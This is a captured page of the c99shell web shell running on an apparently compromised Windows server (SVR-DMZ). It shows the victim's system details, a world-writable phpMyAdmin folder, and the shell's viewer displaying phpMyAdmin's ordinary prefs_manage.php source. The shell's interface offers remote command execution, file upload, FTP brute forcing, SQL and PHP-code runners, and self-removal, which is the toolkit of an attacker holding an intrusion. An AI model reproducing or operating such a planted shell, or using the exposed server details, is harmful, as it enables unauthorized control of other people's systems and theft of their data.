!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\phpMyAdmin\   drwxrwxrwx
Free 10.11 GB of 239.26 GB (4.22%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prefs_manage.php (12.9 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
base_settings); PMA_userprefsPageInit($cf); $error = ''; if (isset($_POST['submit_export']) && filter_input(INPUT_POST, 'export_type') == 'text_file' ) { // export to JSON file PMA_Response::getInstance()->disable(); $filename = 'phpMyAdmin-config-' . urlencode(PMA_getenv('HTTP_HOST')) . '.json'; PMA_downloadHeader($filename, 'application/json'); $settings = PMA_loadUserprefs(); echo json_encode($settings['config_data']); exit; } else if (isset($_POST['submit_get_json'])) { $settings = PMA_loadUserprefs(); $response = PMA_Response::getInstance(); $response->addJSON('prefs', json_encode($settings['config_data'])); $response->addJSON('mtime', $settings['mtime']); exit; } else if (isset($_POST['submit_import'])) { // load from JSON file $json = ''; if (filter_input(INPUT_POST, 'import_type') == 'text_file' && isset($_FILES['import_file']) && $_FILES['import_file']['error'] == UPLOAD_ERR_OK && is_uploaded_file($_FILES['import_file']['tmp_name']) ) { // read JSON from uploaded file $open_basedir = @ini_get('open_basedir'); $file_to_unlink = ''; $import_file = $_FILES['import_file']['tmp_name']; // If we are on a server with open_basedir, we must move the file // before opening it. The doc explains how to create the "./tmp" // directory if (!empty($open_basedir)) { $tmp_subdir = (PMA_IS_WINDOWS ? '.\\tmp\\' : 'tmp/'); if (is_writable($tmp_subdir)) { $import_file_new = tempnam($tmp_subdir, 'prefs'); if (move_uploaded_file($import_file, $import_file_new)) { $import_file = $import_file_new; $file_to_unlink = $import_file_new; } } } $json = file_get_contents($import_file); if ($file_to_unlink) { unlink($file_to_unlink); } } else { // read from POST value (json) $json = filter_input(INPUT_POST, 'json'); } // hide header message $_SESSION['userprefs_autoload'] = true; $config = json_decode($json, true); $return_url = filter_input(INPUT_POST, 'return_url'); if (! is_array($config)) { $error = __('Could not import configuration'); } else { // sanitize input values: treat them as though // they came from HTTP POST request $form_display = new FormDisplay($cf); foreach ($forms as $formset_id => $formset) { foreach ($formset as $form_name => $form) { $form_display->registerForm($formset_id . ': ' . $form_name, $form); } } $new_config = $cf->getFlatDefaultConfig(); if (!empty($_POST['import_merge'])) { $new_config = array_merge($new_config, $cf->getConfigArray()); } $new_config = array_merge($new_config, $config); $_POST_bak = $_POST; foreach ($new_config as $k => $v) { $_POST[str_replace('/', '-', $k)] = $v; } $cf->resetConfigData(); $all_ok = $form_display->process(true, false); $all_ok = $all_ok && !$form_display->hasErrors(); $_POST = $_POST_bak; if (!$all_ok && isset($_POST['fix_errors'])) { $form_display->fixErrors(); $all_ok = true; } if (!$all_ok) { // mimic original form and post json in a hidden field include 'libraries/user_preferences.inc.php'; $msg = PMA_Message::error( __('Configuration contains incorrect data for some fields.') ); $msg->display(); echo '
'; $form_display->displayErrors(); echo '
'; echo '
'; echo PMA_URL_getHiddenInputs() . "\n"; echo ''; echo ''; if (! empty($_POST['import_merge'])) { echo ''; } if ($return_url) { echo ''; } echo '

'; echo __('Do you want to import remaining settings?'); echo '

'; echo ''; echo ''; echo '
'; exit; } // check for ThemeDefault and fontsize $params = array(); if (isset($config['ThemeDefault']) && $_SESSION['PMA_Theme_Manager']->theme->getId() != $config['ThemeDefault'] && $_SESSION['PMA_Theme_Manager']->checkTheme($config['ThemeDefault']) ) { $_SESSION['PMA_Theme_Manager']->setActiveTheme($config['ThemeDefault']); $_SESSION['PMA_Theme_Manager']->setThemeCookie(); } if (isset($config['fontsize']) && $config['fontsize'] != $GLOBALS['PMA_Config']->get('fontsize') ) { $params['set_fontsize'] = $config['fontsize']; } if (isset($config['lang']) && $config['lang'] != $GLOBALS['lang'] ) { $params['lang'] = $config['lang']; } if (isset($config['collation_connection']) && $config['collation_connection'] != $GLOBALS['collation_connection'] ) { $params['collation_connection'] = $config['collation_connection']; } // save settings $result = PMA_saveUserprefs($cf->getConfigArray()); if ($result === true) { if ($return_url) { $query = explode('&', parse_url($return_url, PHP_URL_QUERY)); $return_url = parse_url($return_url, PHP_URL_PATH); foreach ($query as $q) { $pos = strpos($q, '='); $k = substr($q, 0, $pos); if ($k == 'token') { continue; } $params[$k] = substr($q, $pos+1); } } else { $return_url = 'prefs_manage.php'; } // reload config $GLOBALS['PMA_Config']->loadUserPreferences(); PMA_userprefsRedirect($return_url, $params); exit; } else { $error = $result; } } } else if (isset($_POST['submit_clear'])) { $result = PMA_saveUserprefs(array()); if ($result === true) { $params = array(); if ($GLOBALS['PMA_Config']->get('fontsize') != '82%') { $GLOBALS['PMA_Config']->removeCookie('pma_fontsize'); } $GLOBALS['PMA_Config']->removeCookie('pma_collaction_connection'); $GLOBALS['PMA_Config']->removeCookie('pma_lang'); PMA_userprefsRedirect('prefs_manage.php', $params); exit; } else { $error = $result; } exit; } $response = PMA_Response::getInstance(); $header = $response->getHeader(); $scripts = $header->getScripts(); $scripts->addFile('config.js'); require 'libraries/user_preferences.inc.php'; if ($error) { if (!$error instanceof PMA_Message) { $error = PMA_Message::error($error); } $error->display(); } ?>
' . __('Import') . '' . '
' . PMA_Util::generateHiddenMaxFileSize($GLOBALS['max_upload_size']) . PMA_URL_getHiddenInputs() . '' . '' . '' . '
' . '' . '' . '
' . '' . '' . '
' . '
' . __('Settings will be imported from your browser\'s local storage.') . '
' . '
' . __('Saved on: @DATE@') . '
' . '
'; PMA_Message::notice(__('You have no saved settings!'))->display(); echo '
' . '
' . '
'; PMA_Message::notice( __('This feature is not supported by your web browser') )->display(); echo '
' . '
' . '' . '' . '

' . '' . '
' . '
'; if (file_exists('setup/index.php')) { // show only if setup script is available, allows to disable this message // by simply removing setup directory ?>

', ''); echo PMA_Util::showDocu('setup', 'setup-script'); ?>

' . '
' . PMA_URL_getHiddenInputs() . '
' . '' . '' . '
' . '' . '' . '
' . '
' . '' . __('Settings will be saved in your browser\'s local storage.') . '
' . '' . __('Existing settings will be overwritten!') . '' . '
' . '' . '
'; PMA_Message::notice( __('This feature is not supported by your web browser') )->display(); ?>

'; ?>
' . __('Reset') . '' . '
' . PMA_URL_getHiddenInputs() . __('You can reset all your settings and restore them to default values.') . '

' . '' . '
'; ?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--